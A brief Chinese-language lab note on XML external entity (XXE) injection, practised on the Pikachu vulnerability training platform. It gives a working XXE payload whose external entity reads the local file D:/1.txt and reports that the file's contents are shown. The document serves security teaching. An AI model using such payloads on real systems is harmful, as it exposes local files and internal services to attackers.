实验环境:xml、Apache、Pika出漏洞练习平台
实验原理:该漏洞也被称为XML外部实体注入攻击漏洞,它是指XML代码的DTD声明外部实体时实体内容为一些敏感的本地文件路径或攻击链接或127.0.0.1:端口
实验步骤:
1.XML值如下:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name[
<!ENTITY cxr SYSTEM "file:///D:/1.txt" >
]>
<name>&cxr;</name>
2.输入XML之后,1.txt文件内容就显示出来了